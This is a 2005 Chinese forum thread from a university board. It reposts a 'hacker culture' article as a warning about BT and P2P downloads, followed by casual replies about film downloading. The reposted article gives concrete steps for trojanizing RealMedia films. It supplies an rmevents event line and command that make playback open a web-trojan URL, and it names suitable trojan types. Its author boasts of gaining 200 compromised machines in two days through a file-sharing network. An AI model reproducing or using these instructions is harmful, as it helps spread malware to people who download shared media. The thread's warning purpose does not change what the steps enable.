论坛启用新域名www.gzhucm.com,请继续支持我们
切换到宽版
  • 2576阅读
  • 4回复

【转贴】 请大家慎用BT等P2P或P2PS软件 [复制链接]

上一主题 下一主题
离线yuze1981

只看楼主 倒序阅读 0  发表于: 2005-03-17
我转这个贴的目的是给大家敲个警钟,希望大家在用BT等软件的时候一定要小心慎重。

[黑客文化]并不神奇的Real影片木马
coolsys 发表于 2005-3-17 22:31:00

在P2P软件里,很多的Real影片都是危险的,这只是一个小技巧,辅助的一种入侵方式,但这种方法很有效果,比如在著名的A片交流软件PP点点通里,我放了一个这样的小木马,两天就有200个肉鸡,并且呈几何状增长.大家别做坏事。

使用Helix Producer Plus 9的rmevents.exe来修改影片的剪辑信息,可以在指定时间打开指定的窗口.
新建一个文本文件rmevents.txt.
输入:
u 00:01:00.0 00:01:30.0 http://www.muma.com.cn/muma.html
我来解释一下,它意思是说在00:01:00.0 00:01:30.0这个时间范围内打开后面的URL,后面的URL就是我们的木马地址。
输入rmevents -i 电影.rm -e rmevents.txt -o 电影1.rm 这个命令,生成的电影.rm就是我们的木马文件了。

http://www.muma.com.cn/muma.html这个地址是你做好的网页木马的地址,不管是动鲨木马啊,还是EXE2BMP的木马,还是什么CHM木马,还是我崇拜的冰狐大哥的IFRAME溢出的网页木马都可以。主要是新,威力强。
只看该作者 1  发表于: 2005-03-19
好彩我唔用BT
A片交流软件?乜软件?
离线yuze1981
只看该作者 2  发表于: 2005-03-19
你也感兴趣??

这个不是我写的,你去问作者把。哈哈。
离线六月的疯
只看该作者 3  发表于: 2005-03-20
偶尔用bt下电影都挺好的,不要乱下A片就行了,要么用卡盟下也挺方便的!!

别惹我!
离线逝去日子
只看该作者 4  发表于: 2005-03-27
卡盟下,好慢的.我宁愿不看.
.......................大脑皮层神经萎缩无定向日思夜想痴呆妄想症!!!....................................